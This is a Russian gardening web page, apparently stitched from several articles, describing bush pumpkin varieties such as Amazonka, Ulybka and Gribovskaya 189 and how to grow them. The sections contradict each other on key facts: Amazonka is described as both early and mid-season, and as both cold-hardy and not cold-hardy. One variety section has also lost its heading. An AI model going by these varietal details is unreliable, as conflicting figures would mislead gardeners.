2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Тыква амазонка описание

Лучшие сорта кустовых тыкв

В отличие от плетистой кустовая тыква не распускает длинные побеги и не стелется по земле. Многие ее выращивают с целью экономии места. Некоторые этапы ухода, необходимые плетистым видам, опускают, что облегчает выращивание. Сорта такой тыквы характеризуются тем, что не нужно долго ждать ее урожая. Плоды преимущественно небольшие.

Лучшие сорта кустовых тыкв

Выбор сорта

Культивируя тыкву, нужно учитывать условия конкретного региона. От некоторых кустовых видов можно добиться высокого урожая даже в сложном и переменчивом климате.

Для Сибири

Если не подойти ответственно к выбору сорта, можно остаться неудовлетворенным результатом выращивания. Регион отличается суровыми условиями. Созреть тут могут такие популярные виды:

  • Веснушка – шаровидная, немного приплюснутая. Вес до 3 кг. Срок созревания ранний. Цвет кожуры зеленоватый с желтыми точками. Мякоть сочная, сладковатая, обладает фруктовым привкусом;
  • Адажио – плоды круглые, сильно приплюснутые, с углублением возле плодоножки. Средний вес – 3 кг. Срок созревания среднеранний. Мякоть обладает хорошим вкусом. Продукт применяют для производства диетического и детского питания.

Для Урала

Регион отличается продолжительными периодами заморозков. Для выращивания подойдет большинство сортов, кроме Амазонки и Медовой красотки. Среди них выделяют виды:

  • Дачная – холодостойкий сорт, отличается ранним сроком созревания. Вес плодов – до 4 кг. Кожура зеленая с желтыми полосками. Мякоть желтого цвета, вкусная. Обладает приятным запахом;
  • Кустовая золотая – вид с ранним сроком созревания. Плоды округлые, сплющенные. Масса – до 5 кг. Поверхность сегментирована. Кожура золотистая. Мякоть желтая, хрустящая, несладкая.

Для средней полосы России

Сорта кустовой тыквы для региона должны быть районированными, иначе плоды не успеют созреть. Для культивирования на территории средней полосы страны, в том числе Подмосковья, подходят следующие виды:

  • Мускатная – название объединяет виды, обладающие похожими характеристиками. Мякоть у них сладкая. Вырастить культуру можно только рассадным способом, т.к. для созревания ей требуется много времени;
  • Апорт – относится к самым вкусным сортам. Плоды округлой формы, чуть сплюснутые сверху и снизу. Поверхность почти гладкая. Имеет средние сроки созревания. Вес – до 7 кг. Мякоть сочная, хрустящая, отличается сладостью.

Обзор лучших сортов

Тыква кустовая полюбилась огородникам за полезный состав и отличные вкусовые качества. Среди множества видов некоторые получили особое признание.

Улыбка

Плоды могут храниться в свежем виде долгое время

Сорт выведен в России около 15 лет назад. Отлично адаптирован к сложным условиям климата. От массовых всходов до сбора плодов проходит до 3 месяцев.

Растение небольшое. Формирует 6 метровых побегов. Листья крупные, зеленые, узорчатые. Цветки желтые или оранжевые. Приятно пахнут.

Плоды отличают такие качества:

  • форма шаровидная, слегка приплюснутая;
  • вес – 1 кг;
  • кожура оранжевая, средней толщины, прочная, не разделена на сегменты, полосатая;
  • мякоть оранжевая, плотная, с запахом дыни;
  • вкус отличный.

На кусте бывает до 15 плодов. Женские цветки образуют боковые плети. Семенная камера маленькая. Семечки продолговатые, белые, гладкие.

Сорт Улыбка ценится за транспортабельность и устойчивость к морозам. Его выращивают на Урале и в Сибири. Урожайность – 3 кг с 1 кв. м. Занимает одно из лидирующих мест по диетическим характеристикам и содержанию витаминов. Поспевшая тыква сохраняет товарный вид до зимнего периода.

Акорн

Второе название – Желудевая. Выведена недавно. Один из самых ранних видов кустовых тыкв. Сбор урожая возможен спустя 80 дней после массовых всходов. Бывают и плетистые сорта Акорна.

Плоды отличаются такими характеристиками:

  • желудевидной формой – отсюда и второе название;
  • небольшим весом – 600-700 г;
  • толстой кожурой с желобками;
  • цветом корки от темно-зеленого до оранжево-пятнистого;
  • плотной, оранжево-желтой мякотью;
  • сладким вкусом.

Кустовую тыкву этого сорта используют для приготовления десертов. Из-за особой структуры ее легко фаршировать. Имеет хорошую лежкость. Кожуру нет необходимости удалять – она съедобная. Семечки вкусные. Часто твердокорые виды тыквы выращивают ради них.

Получен в результате скрещивания видов Миндальная 35 и Находка. Относят к ультраскороспелым – плоды созревают через 90-100 суток после всходов. Показатели урожайности – 25-40 т/га. Товарность – 93 %.

Плоды сорта, согласно описанию:

  • среднесплюснутые;
  • кожура преимущественно гладкая, около плодоножки имеет ребра;
  • цвет в несозревшем виде темно-зеленый, потом становится желто-оранжевым;
  • средний вес – 3,2 кг;
  • мякоть оранжевая, средней плотности, сочная;
  • дегустационная оценка – 4,2 балла.

Сорт Лель обладает иммунитетом к мучнистой росе и антракнозу. Устойчивость к пероноспорозу средняя. Применение преимущественно техническое. Подходит для зеленого конвейера. Блюда из тыквы не готовят.

Сорт Лель не подходит для употребления в пищу

Семена кремового оттенка. Выход – 0,4-0,6 т/га. Их используют для получения тыквенного масла, потому что семечки содержат до 50 % жиров. На его основе делают разные лекарства.

Амазонка

Куст компактный. Образует до 3 завязей. Длина основной плети – 1 м. Листья темно-зеленые, маленькие. Сорт скороспелый – урожай собирают через 80-85 дней после всходов.

Плоды отличают следующие качества:

  • по форме округло-сплющенные;
  • весят в среднем 1 кг;
  • кожура темно-оранжевая, полосатая;
  • мякоть оранжевая, сладкая, хрустящая.

Семена мелкие, бело-серые, шероховатые. Из плодов готовят соки, десерты, пюре. Блюда из тыквы являются одной из составляющих детского и диетического питания. Семенная камера большая. Семечек много. Плоды сохраняют товарный вид около 4 месяцев. Урожайность – 36-68 т/га.

Грибовская 189

Сорт выведен российскими селекционерами. Особенно популярен он в Сибири и на Урале. Созревание раннее – от всходов до сбора урожая проходит около 86-98 дней. Грибовская кустовая ценится за высокую отдачу плодов – до 39,8 т/га. Имеет устойчивость к гнили, слабо поражается мучнистой росой и бактериозом.

Растение мощное. На каждом кусте – по два плода, которые характеризуются таким описанием:

  • форма продолговатая, сужается к основанию;
  • масса – до 5 кг;
  • поверхность гладкая или слегка ребристая;
  • кожура тонкая, прочная, сначала темно-зеленая, потом оранжевая с зелеными полосами;
  • мякоть толстая, плотная, оранжевая, сладкая, приятная на вкус.

Гнездо для семян большое. Товарные качества высокие. Из тыквы Грибовской готовят разные блюда, ее консервируют.

Медовая красотка

Разновидность мускатных тыкв. Завезена с Китая. Созревание раннее – около 3 месяцев. Урожайность – до 50 т/га. Имеет относительную устойчивость к мучнистой росе.

Отличительные характеристики плодов следующие:

  • шарообразная форма;
  • оранжевые, часто с зелеными точками, с выделенными ребрами;
  • вес – 6 кг;
  • тонкая и прочная кожура;
  • оранжевая, хрустящая, ароматная и вкусная мякоть.

Созревшая тыква подлежит хранению. Из нее готовят каши, десерты, соки. Переносит сорт перевозки на длительные расстояния.

Лечебная

Эта тыква – результат работы кубанских ученых. Срок созревания ранний – до 105 дней. Урожайность – 3,7-4,2 кг/м². Применяют в столовых целях.

Тыква ценится за хороший вкус

Сила роста куста средняя. Плети короткие. Листовые пластины 5-угольные, сплошные.

  • округло-сплюнутые;
  • серого цвета;
  • разделены на небольшие сегменты;
  • весят 3-5 кг;
  • с тонкой кожурой;
  • с оранжевой, средней толщины, хрустящей мякотью;
  • вкусные.

Камера для семян средняя. Семечки овальные, белые, гладкие. Масса 100 штук – 27 г.

Сорт Лечебная поражается мучнистой росой, серой и белой гнилью, антракнозом. Тыква хорошо переносит холода. Выдерживает перевозку и может долго сохранять товарные качества.

Кустовая оранжевая

Тыква получена в результате работы кубанских селекционеров. Характеризуется средним сроком созревания – 100 суток.

Тыква Кустовая оранжевая характеризуется такими плодами:

  • шаровидными;
  • слаборебристыми;
  • с оранжевой и тонкой кожурой;
  • массой до 4,5 кг;
  • с оранжевой, сахаристой, сочной, хрустящей и сладкой мякотью.

Применение универсальное. Тыква подходит для приготовления салатов, десертов, консервации, запекания и зимнего хранения.

Жемчужина

Выращивают тыкву в открытом грунте в средней полосе России. Куст имеет 6 побегов. На каждом образовывается одна завязь. Срок созревания – примерно 100 дней. С 1 га собирают 50 т плодов, которые отличаются такими характеристиками:

  • цилиндрообразной формой;
  • длиной до 0,5 м;
  • весом до 7 кг;
  • кожурой оранжевого цвета с сизым налетом;
  • темно-оранжевой, плотной, хрустящей и сочной мякотью;
  • сладким вкусом.

Семена мелкие. Тыква хранится долго, но из-за тонкой кожуры могут возникать повреждения при перевозке.

Стофунтовая

Вес плода может достигать 20 кг

Вид среднепоздний – созревание наступает через 130 суток после появления всходов. Урожайность – 6,3 кг/м². Обладает иммунитетом к бактериозу, мучнистой росе, гнили.

  • шаровидные;
  • слабосегментированные;
  • большие – масса 10 кг, иногда и 20 кг – при соблюдении условий выращивания;
  • с тонкой, желто-оранжевой кожурой;
  • мякоть с рыхлой структурой, кремово-желтая, не очень сладкая, малоароматная.

Вид характеризуется кормовым назначением. Востребован в сельском хозяйстве.

Особенности выращивания в открытом грунте

Чтобы культура порадовала высокими показателями урожайности, необходимо соблюдать правила агротехники.

Посадка

Процесс предусматривает несколько этапов.

Подготовка участка

Тыква любит хорошо освещенные участки. Лучшие «предшественники» для нее – это бобовые, картофель, лук и капуста. Участок подготавливают с осени. Для этого под глубокую перекопку земли на 1 м² вносят такие вещества:

  • компост – 5 кг;
  • хлористый калий – 15 г;
  • суперфосфат – 30 г.

При повышенной кислотности почвы вносят также древесную золу или известь. Весной землю перекапывают снова, но уже неглубоко. Удобряют ее, внося по 20 г аммиачной селитры на 1 м².

Подготовка семян

Для посадки подойдет посевной материал, которому менее 3 лет. Сначала отбирают крупные и полновесные семечки. Далее их заливают нагретой до 50 °С водой. Оставляют на несколько часов. Потом заворачивают во влажную ткань. Проклюнувшиеся семечки укладывают в холодильник, в отсек для овощей.

Посев в открытый грунт

Этот способ высадки применяют в регионах с теплым климатом. Когда земля на глубине 10 см прогреется до 12 °С, делают ямки. Поливают. В каждую лунку помещают 2-3 семечки. Схема высадки – 0,7×0,7 м. После всходов оставляют один наиболее окрепший росток.

Выращивание рассады

Сосуды объемом 0,3 л наполняют землей, которую смешивают наполовину с перегноем. Семена проращивают за 20-22 дня до предполагаемой даты высадки. Их углубляют на 5 см, направляя «носиком» вниз. Оставляют в теплом помещении – 22-25 °С. После появления ростков температуру постепенно снижают.

Поливают растения регулярно и умеренно. Подкармливают дважды, используя комплексное удобрение. За 1-2 недели до высадки посевы закаляют. В открытый грунт высаживают в фазе 3-4 листьев.

Растение нуждается в регулярном поливе

Кустовые тыквы нуждаются в создании благоприятных условий.

Полив

Культура активно испаряет влагу через листья. Полив выполняют регулярно. Особенно растения нуждаются в обильном количестве влаги в такие периоды:

  • перед цветением;
  • при формировании плодов.

Воду берут отстоянную и теплую – 20 °С. За месяц до сбора плодов полив прекращают. Уход за растением предусматривает рыхление грунта после каждого увлажнения.

Подкормки

Если почва удобрена с осени, то дополнительно вносить питательные вещества не нужно. Когда она истощена, проводят такие подкормки:

  • спустя 10 дней после посадки берут 1 л навоза на ведро воды. Можно также взять 10 г нитрофоски на 10 л жидкости;
  • во время плодоношения используют те же составы.

Можно удобрять растения 3-4 раза. Вместо навоза применяют куриный помет, зеленое удобрение. Органические подкормки чередуют с минеральными.

Искусственное опыление

Если погода плохая и отсутствуют насекомые-опылители, нужно самостоятельно перенести пыльцу. Для этого используют мягкую кисточку. Можно также прислонить мужской цветок к рыльцу женского.

Преимущества и недостатки

К достоинствам кустовых сортов культуры относят:

  • компактность – это свойство позволяет выращивать растение на небольших площадях открытого грунта;
  • строение куста – благодаря ему влага в грунте сохраняется дольше, что положительно влияет на урожайность;
  • переносимость низких температур;
  • легкость в уходе;
  • высокие показатели урожайности у большинства видов;
  • скоро- и среднеспелость – в отличие от плетистых сортов.

Среди недостатков кустовой тыквы выделяют:

  • преимущественно твердую кожуру;
  • плоды не всех сортов обладают сладостью.

Лучшие сорта тыквы кустовой для открытого грунта: описание, фото

Тыкву люди выращивают уже около 5 тыс. лет. Овощ это не только неприхотливый в уходе, но и очень вкусный и полезный. На дачных участках может выращиваться как плетущаяся тыква, так и кустовая. Последняя разновидность пользуется у дачников особой популярностью. Далее в статье и разберемся с тем, что представляет собой тыква кустовая. Сорта, фото, описание — все это можно будет найти в обзоре.

Какую выбрать?

Плоды у кустовой тыквы формируются у основания стебля. Размеры они имеют обычно не слишком большие. Еще одной особенностью сортов этой разновидности является то, что их плоды созревают довольно рано. Собирать урожай такой тыквы можно обычно уже на 80-110-й день после посадки. Позднеспелых кустовых сортов сегодня практически не существует. Стебли у тыквы этой разновидности прямостоячие. Поэтому под ними очень хорошо сохраняется влага.

Из ранних наибольшей популярностью у дачников пользуются такие сорта тыквы кустовой:

Грибовская кустовая 189.

Созревают плоды этих сортов на 80-90-й день после посадки. Из среднеспелых чаще всего дачники выращивают:

Эти сорта тыквы кустовой ценятся огородниками в том числе и за то, что урожай их можно собирать уже на 90-110-й день после посадки.

Какую тыкву выбрать дачникам Сибири и Урала

Плетистые тыквы могут давать большие урожаи. Но в уходе такие разновидности достаточно сложны. Владельцам загородных участков, к примеру, приходится прищипывать их, удалять лишние завязи. К тому же и подходят тыквы плетистые в основном лишь для очень больших участков. Именно поэтому многие дачники и предпочитает лучшие сорта кустовых. Тыквы для открытого грунта этой группы практически не занимают места на участке. Прищипывать их также нужно. Однако проводить эту процедуру в данном случае гораздо проще.

В общем и целом овощ это довольно-таки теплолюбивый. Представленные в списках выше сорта ценятся дачниками не только за хорошую урожайность и отличный вкус плодов, но и за устойчивость к холоду. Это на самом деле очень популярные кустовые тыквы. Сорта для Сибири и Урала (за исключением Амазонки и Медовой красотки) подходят практически так же хорошо, как и для юга России. Отличные урожаи от них можно получать даже в жестком, переменчивом климате.

Сорта тыквы кустовой: Улыбка

Ценятся плоды этой тыквы дачниками прежде всего за их высокие вкусовые качества. Выведена была тыква Улыбка не так давно — около 15 лет назад, специалистами ГНУ ВНИИСООК.

Толщина коры у плодов этого сорта не слишком большая. Цвет тыквы Улыбка имеют ярко-оранжевый. На коре у плодов можно видеть едва заметные белые полосы. Мякоть у тыкв этого сорта оранжевая, плотная. Вкус она имеет сладкий. Аромат у мякоти Улыбки не слишком выраженный, дынный. Созревают плоды сорта очень рано — примерно через три месяца после посадки.

Сам куст компактный, не слишком высокий. Листья у этого сорта довольно большие, светло-зеленые. Каждый куст Улыбки дает около шести толстых побегов длиной примерно в 1 метр.

Особенности ухода за тыквой Улыбка

Вырастить неплохой урожай этого сорта на дачном участке совершенно не сложно. Сажать тыкву Улыбка рекомендуется на хорошо освещенном солнцем месте. Семена этого сорта обычно заглубляют в землю на 5-7 см. К преимуществам этой тыквы, помимо всего прочего, относят и холодостойкость. Высаживать ее в открытый грунт можно уже в конце мая. Стандартная схема расположения растений этого сорта на грядках — 75х75 см.

Поливают тыкву Улыбка, как и большинство других сортов, по мере подсыхания почвы. Удобряют ее в летнее время обычно крапивным настоем.

Тыквы Акорн

Этот интересный сорт был выведен совсем недавно. За очень небольшие размеры плодов многие дачники называют его «желудевым». В продаже сегодня встречаются как плетистые, так и кустовые разновидности этого сорта. Цвет кожуры у тыквы Акорн бывает разным. Обычно на дачных участках можно видеть темно- или светло-зеленые тыквы этого сорта. Но иногда встречаются и белые разновидности.

Мякоть у этой тыквы очень сладкая, сочная и нежная, с кремовым привкусом. Цвет она имеет желто-оранжевый. Максимальный вес плодов сорта Акорн — 1.5 кг. Созревают они примерно на 85-й день после посадки.

Как ухаживают за тыквой Акорн

Сажают эту тыкву обычно по схеме 70х70 см. Удобрения под нее вносят чаще всего только при высеве. В Средней полосе России высаживают Акорн в мае-июне. Для того чтобы защитить ростки от заморозков, их стоит в первое время укрывать пленкой. Поливать эту тыкву желательно только теплой водой (не ниже +20 С).

Сорт Лель

Это очень ранняя тыква кустовая. Сорта (отзывы хорошие о них имеются в том числе и по этой причине) этой группы дают плоды обычно уже к середине лета. Урожай тыквы Лель можно собирать на 90-й день после посадки. Форму плоды этого сорта имеют среднесплюснутую. Ребра на тыквах сорта Лель заметны только у самого основания. Цвет у кожуры плодов этого сорта желто-оранжевый со светло-коричневыми полосами. Веса тыквы Лель могут достигать в 3-3.5 кг.

Уход за сортом

Выращивают эту тыкву в основном только крупные предприятия агропромышленного комплекса. Мякоть у плодов не слишком вкусная. Основную ценность у этого сорта представляют семена. Очень часто имеющееся в магазинах в продаже тыквенное масло сделано именно с их использованием.

Выращивать этот сорт относительно несложно. Плохие погодные условия слишком сильного негативного действия на него не оказывают. Устойчива тыква Лель и к болезням. Мучнистой росой, антракнозом и пероноспорозом эти растения, к примеру, практически никогда не заболевают.

Тыква Амазонка

Безусловным преимуществом этого сорта является компактность куста. Относится тыква Амазонка к группе среднеспелых. Собирать урожай с кустов этого сорта можно на 100-110-й день после посадки. Плоды Амазонки имеют плоскую форму и темно-оранжевую с белыми полосами кожуру. Выглядят они очень аккуратными. Вес плодов этого сорта обычно равен 1-2 кг.

Мякоть у тыквы Амазонка ярко-оранжевая сладкая, хрустящая. К преимуществам сорта, помимо всего прочего, относят и способность плодов долго храниться, повышенное содержание в них каротина и их транспортабельность. Кусты у тыквы Амазонка небольшие, стебли толстые, а листья имеют темно-зеленый цвет.

Особенности ухода за сортом

К группе холодостойких тыква Амазонка не относится. Поэтому выращивают в открытом грунте ее обычно только на Украине, в Беларуси и на юге России. Сажают семена этого сорта в этих регионах в апреле-мае. Рекомендуемая схема размещения растений Амазонки на грядке — 150х150 см.

Грибовская кустовая 189

Этот старейший сорт известен многим российским дачникам. Очень многие огородники интересуются тем, какие подходят сорта тыквы кустовой для Урала. Дачникам этого региона обязательно стоит обратить внимания на Грибовскую кустовую 189. Сорт это в отношении погодных условий очень неприхотливый.

Плоды у Грибовской кустовой тыквы большие — могут достигать веса в 2-2.5 кг. В некоторых случаях на кустах вырастают плоды массой и до 5 кг. Форму тыквы этого сорта имеют обратнояйцевидную, продолговатую. Окраска у плодов Грибовской кустовой темно-зеленая. По мере созревания цвет их коры меняется на светло-оранжевый.

Мякоть у плодов этого сорта очень плотная, оранжевая, сладкая. Собирают урожай этой тыквы уже на 80-й день после посадки. Плоды Грибовской можно использовать для приготовления очень вкусных блюд. Многие дачники считают, что этот сорт имеет самую вкусную мякоть.

Уход за Грибовской

Лучшие сорта кустовой тыквы обычно отличаются холодостойкостью. К группе именно таких разновидностей, как уже упоминалось, относится и Грибовская 189. Сорт этот может выращиваться в том числе и в Подмосковье, на Урале и в Сибири. К преимуществам Грибовской кустовой 189 многие дачники относят и то, что эта тыква очень устойчива к разного рода заболеваниям. Высаживать этот сорт в открытый грунт в средней полосе России положено в мае-июне. Рекомендованная схема расположения для него — 60х60 см.

Медовая красотка

Это также очень популярная тыква кустовая. Сорта (фото на странице это подтверждают) этой группы обычно имеют довольно-таки аккуратные плоды. К Медовой красотке это относится в полной мере. К плюсам плодов этого сорта также относят и их превосходные вкусовые качества.

Созревает тыква Медовая красотка примерно на 90-100-й день после посадки. Форму они имеют округлую с четко выраженными ребрами. Цвет у кожуры плодов этого сорта оранжевый. Собственно сама кора у Медовой красотки очень тонкая. Мякоть у плодов сочная, сладкая, хрустящая и ароматная. Вес тыкв этого сорта может достигать 4-6 кг.

Особенности ухода

Морозостойкостью сорт Медовая красотка не отличается. Подходит он для выращивания в основном в Краснодарском крае, на Ставрополье, на Украине, в Молдове. Высаживать в открытый грунт его рекомендуется в апреле-мае. Заглубляют семена Медовой красотки в зависимости от типа почвы на 2-5 см.

В уходе этот сорт неприхотлив, однако требует периодических подкормок. В первый раз удобрения вносят под растения в начале цветения. При этом используют обычно простую навозную жижу. Вторую подкормку делают через 10 дней. В грядки вносят азотистые удобрения или перегной. В дальнейшем тыквы подкармливают с интервалом в 7-10 дней. Во время завязи и созревания плодов используют в основном комплексные минеральные составы, не содержащие азота.

Сорт Лечебная

Основным плюсом этой крупноплодной тыквы является длительный срок хранения плодов. В прохладном месте они могут пролежать до мая. Веса плоды этого сорта достигают в 3-5 кг. Кожура их имеет светло-серый цвет. Помимо оттенка, отличить эту тыкву от других сортов можно и по характерным прерывистым полоскам на плодах. Мякоть у тыквы Лечебной вкусная, светло-оранжевая, хрустящая и сладкая. К преимуществам этого сорта многие дачники относят в том числе и повышенное содержание каротина в мякоти. Созревают тыквы на 100-105-й день после посадки.

Особенности возделывания

По морозостойкости сорта тыквы кустовой Улыбка и Грибовская Лечебную слегка превосходят. Выращивают эту тыкву чаще всего на юге. Однако при должном уходе получать хорошие урожаи сорта Лечебная можно и в средней полосе России, и на Урале, и даже в Сибири. Для этого нужно просто укрывать всходы весной пленкой.

Высаживать эту тыкву рекомендуется по схеме 80х80 см. Делать это желательно в мае-июне. Семена ее заглубляют в землю на 4-6 см. Уход за этим сортом осуществляется стандартный. Никаких особых рекомендаций для него не предусмотрено.

Сорт тыквы Кустовая оранжевая

Этот сорт, как и Лечебная, относится к группе крупноплодных. Веса плоды Кустовой оранжевой могут достигать до 5 кг. Собственно само же растение при этом отличается компактностью.

Несмотря на то что этот сорт относится к группе кустовых, во второй половине сезона он может образовывать не слишком длинные плети. Цвет кожуры у плодов этой тыквы очень яркий, оранжевый. Форму они имеют овальную, немного сплюснутую. Мякоть у Кустовой оранжевой желтая, сладкая. К преимуществам сорта многие дачники относят в том числе и лежкость его плодов.

Особенности посадки

Плюсом тыквы Кустовая оранжевая считается прежде всего то, что возделывать ее можно в том числе и в заслушливых регионах. К недостатку влаги этот сорт абсолютно не чувствителен. Также Кустовая оранжевая очень неплохо переносит разного рода неблагоприятные погодные условия. Высаживают эту тыкву по стандартной схеме 60х60 см или 70х70 см.

Вместо заключения

Таким образом, мы выяснили, какие существуют наиболее популярные огородной культуры тыква кустовая, сорта. Фото впечатляющих плодов этой группы представлены на странице. Вырастить такие же красивые аккуратные тыквы на своем участке под силу любому дачнику. К плюсам кустовых сортов относят в том числе и их неприхотливость. Однако ухаживать за этой культурой следует, конечно же, обязательно. В этом случае она порадует хозяев участка высокими урожаями и прекрасными вкусовыми качествами самих плодов.

Очень компактная и плодовитая тыква «Амазонка» с хрустящей сладкой мякотью: чем хороша и как вырастить правильно

Тыква это не только полезный овощ, но и незаменимый ингредиент для приготовления сладких и пряных блюд. Она прекрасно сочетается с медом, яблоком, корицей и имбирем. Чтобы не тратить время на поиски подходящих тыковок в магазине, многие предпочитают выращивать овощи самостоятельно.

Одним из самых популярных сортов признана тыква Амазонка. Рассмотрим подробно, как правильно посадить тыкву Амазонка и что для этого нужно.

Описание сорта тыквы

Амазонка это кустовая компактная тыква, которая не требует к себе много внимания. Сорт скороспелый, созревает в течение 90-100 дней с момента посадки. Побеги и стебель прямостоячие, поэтому культура лучше сохраняет влагу под кустом и показывает стабильную высокую урожайность.

Отличительные черты

Для Амазонки требуется минимум места. Кустики имеют классический зеленый цвет, плоды созревают у основания.

Амазонка не боится холода или засухи, прекрасно переносит основные заболевания культуры. Многие огородники отмечают и декоративную функцию сорта, аккуратные кустики с яркими тыковками украсят любой садовый участок.

Характеристика плодов и урожайность

Плоды имеют плоскую округлую форму и насыщенно-оранжевую плотную кожуру. Вес одной тыквы варьируется от 1 до 2,5 кг. Мякоть очень нежная и сочная, ярко-желтого оттенка. Товарные и вкусовые качества на высоте. Также овощ отлично хранится и переносит перевозки. С одного куста дачники собирают от 7 до 15 красивых и вкусных тыковок.

Интересно! Тыква стала известна людям 8 тысяч лет назад. Впервые ее попробовали индейцы из Южной Америки. Позже культуру стали высаживать во всех уголках земного шара. Овощ не только употребляли в пищу, но также делали из нее посуду, плели коврики из кожуры, а также использовали цветки в качестве украшений.

Как выращивать

Тыква это самая неприхотливая бахчевая культура, поэтому в посадке и уходе трудности возникают крайне редко. Высаживают сорт Амазонка двумя способами: рассадным и безрассадным. В чем суть каждого, рассмотрим ниже, а также уделим внимание особенностям уходу за растением.

Посадка семенами

Этот способ чаще используют огородники из южных регионов страны. Для безрассадного способа понадобится семенной материал, дезинфицирующее средство и стимуляторы роста.

  1. Проверьте семена на всхожесть. Поместите их в солевой раствор и аккуратно помешайте. Те семена, которые остались на поверхности воды, пустые и для посадки не подходят.
  2. Продезинфицируйте материал с помощью раствора древесной золы, из расчета 2 столовые ложки на 1 л воды. Дезинфекция уничтожает на поверхности семян опасных микроорганизмов, а также повышает иммунитет будущих растений.
  3. Закалите материал в течение двух суток при температуре 1 градус.
  4. Поместите семена во влажный тканевый мешочек и положите в теплое место. Через 2 дня добавьте стимулятор роста, например янтарную кислоту. Она ускоряет рост и повышает всхожесть тыквы на 10%.

Под тыкву отводят плодородный и рыхлый грунт. Участок должен быть защищен от ветра и иметь качественный пахотный слой. Сажают культуру после бобовых, лука или зелени. А если посадить сорт Амазонка на компостной куче, то овощ не нуждается ни в рыхлении, ни в прополке. Опытные огородники рекомендуют высаживать Амазонку в начале мая.

Посадка рассадой

Для рассады подготовьте питательную почву. Некоторые дачники готовят состав самостоятельно, используя землю с огорода, торф и перегной. Минус самостоятельно подготовленной почвы в том, что ее нужно обязательно обеззараживать раствором марганцовки. Однако в интернете часто встречаются отзывы о том, что и купленный грунт содержит в себе личинок и мусор. Поэтому независимо от способа приготовления почвы, советуем все равно обработать ее марганцем.

Сеют семена в сухую и чистую тару. Это может быть деревянный ящик или торфяной горшок, пластиковый стаканчик или специальная кассета. Расстояние между саженцами не менее 5 см. Хранят рассаду в теплом и светлом месте, поливают умеренным количеством воды каждые 5-7 дней. Через пару недель ростки удобряют жидкими органическими удобрениями, еще через 10 дней организуют первую минеральную подкормку.

Важно! Для высадки рассады выберите утро прохладного дня. Перед этим подготовьте грядки: сожгите весь мусор, перекопайте почву, внесите торф и опилки. Сорт Амазонка любит смесь суглинистых и супесчаных почв.

Для полива всех тыквенных сортов используйте дождевую или отстоянную воду: при поливах холодной водой повышается риск заражения инфекциями. Тыквенные грядки поливают каждые 10 дней. Во избежание солнечных ожогов проводите процедуру ранним утром или вечером. Периодически в воду добавляют золу или крапиву — таким образом, полив превращается в укрепляющую иммунитет подкормку.

Также тыкву Амазонка регулярно пропалывают. Прополка грядок включает в себя удаление сорняков и рыхление грядок. Если этого не делать, то растение быстро зарастет сорной травой, которая живет за счет овоща. Рыхлят грунт каждые 10 дней, благодаря чему почва становится воздушной, улучшается доступ кислорода к корням тыквы.

Необходимый этап ухода — подкормка растений. В идеале минеральные комплексы чередуют с органическими веществами, так кустики получают сбалансированное питание. Из органики дачники предпочитают крапиву, золу, чеснок, лук. Растворы на основе этих продуктов оказывают профилактическое и питательное действие, повышают урожайность.

Важно! Особое внимание уделите азотным удобрениям. Отличным средством признан раствор суперфосфата, калийной соли и аммиачной селитры. За сезон таким средством подкармливают кусты дважды, строго соблюдая дозировку. Также многие используют минеральные комплексы, такие как «Унифлор», «Юнона», «Огородная смесь».

Особенности выращивания и возможные трудности

Избыток минеральных и азотных удобрений приводит к ряду трудностей. Начинают быстро развиваться побеги, а сами плоды остаются маленькими. Органикой подкармливают после появление двух первых листочков, а минеральные используют во время образования первых завязей. С началом цветения органические удобрения не вносят. Советуют до начала плодоношения подкормить тыкву фосфорно-калийными удобрениями.

Также следите за кислотностью почвы. При ее переизбытке качество и вкус плодов заметно страдает. Чтобы снизить уровень кислотности, внесите дрожжи или золу. Особенно эффективным средством признан полив на их основе. Помимо корневых подкормок, уделите внимание внекорневым. Опрыскивания из пульверизатора дополнительно защищают растения от нежелательных насекомых.

Советы по выращиванию от опытных огородников

Для сбора богатого урожая опытные садоводы рекомендуют придерживаться некоторых правил. Их применение защищает грядки от болезней и улучшает вкусовые качества плодов.

  • тыкву не высаживают после огурцов, кабачков и патиссонов;
  • для наибольшей урожайности тыкву высаживают по схеме 2 х 2 метра;
  • поливают овощ не под корень, а в канаву в виде круга;
  • обильный полив противопоказан, иначе плоды начнут растрескиваться;
  • удобряют кустики в строгом соответствии с дозировками и рекомендациями производителя;
  • для повышения урожайности проводят известкование, которое понижает кислотность почвы и делает ее более питательной.

Многие огородники советуют использовать систему капельного полива. Она увлажняет грядки равномерно, экономит расход воды, а также улучшает фотосинтез и направляет воду прямо к корням. Используют капельную систему в любой период созревания. Также перед поливами почву рыхлят. Так вода лучше поступает в глубь почвы, корневая система развивается быстрее.

Болезни и вредители

Иногда тыква Амазонка заболевает бактериозом. Из-за болезни тыковки становятся мягкими и начинают гнить. На листьях появляются пятна, вскоре весь куст усыхает. В качестве профилактические операция используйте опрыскивания мыльным раствором, который готовят из 5 л воды и 100 г сухого тертого мыла. Жидкость образует защитную пленку на листьях. Если культура уже заболела, то опрыскивайте грядки раствором медного купороса, предварительно подготовив защитную одежду и перчатки.

Еще одно распространенное заболевание называется желтая мозаика. Проявляется в виде яркого желтого узора на листьях. Плоды деформируются, теряют свой товарный вид. Для профилактики тыкву обрабатывают препаратом «Фармайод 3», а также вовремя удаляют сорняки и мусор с грядок.

Из вредителей отмечают слизней и белокрылок, которые появляются из-за повышенной влажности и неправильного ухода. Отличным профилактическим и лечебным средством признана древесная зола. Ее используют и в сухом виде, и в составе раствора с водой.

Сбор и применение урожая

Тыквы собирают, когда плодоножка стала твердой, а листья засохли и приобрели желтый оттенок. Сами тыковки становятся яркими, а кожура плотной. Рекомендуют урожай собирать в сухую погоду.

Плоды снимают вместе с плодоножкой, так они дольше хранятся. Если погода сухая и теплая, то собранный урожай оставляют на пару дней на грядках. В дальнейшем овощи хранят в темном месте при температуре от 5 до 15 градусов. Отличное место для хранения — подвал или кладовая.

Интересно! Тыква содержит в себе большое количество витаминов и минералов. Витамин А обладает сильным омолаживающим эффектом, а также укрепляет волосы и ногти. Витамины группы В благотворно влияют на работу пищеварительной системы, избавляет от газообразования. Также тыква богата клетчаткой, кальцием, магнием и железом. Именно поэтому продукт часто рекомендуют людям, которые придерживаются правильного и диетического питания.

Продукт обладает своеобразным сладковатым вкусом. Овощ используют для приготовления гарниров и салатов, которые сочетаются с рыбными и мясными блюдами. Также из тыквы получаются вкусные блинчики и панкейки, которые служат прекрасным десертом и безопасны для фигуры. Кроме того, овощ активно используется для приготовления супов, особенной популярность пользуется рецепт с добавлением копченостей.

